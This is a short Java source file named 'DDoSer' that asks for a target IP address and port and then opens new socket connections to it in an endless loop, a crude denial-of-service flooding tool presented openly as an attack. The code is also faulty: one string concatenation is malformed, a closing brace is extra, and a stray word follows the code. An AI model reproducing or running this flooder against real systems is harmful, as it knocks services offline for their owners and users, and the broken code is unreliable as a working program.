import java.io.*;
import java.net.*;
import java.util.Scanner;
public class DDoSer {
public String author = "System79";
public String date = "Sun Nov 25";
public static void main(String[] args) throws IOException {
Scanner scanner = new Scanner(System.in);
System.out.println("Please fill in the IP adress to flood:");
String ip = scanner.nextLine();
System.out.println("Please fill in the Port to flood:");
int port = scanner.nextInt();
System.out.println("Starting flood");
try {
while(true) {
new Socket(ip, port);
}
} catch (UnknownHostException e) {
System.err.println("Could not find: "ip);
System.exit(1);
}
}
}
}











hi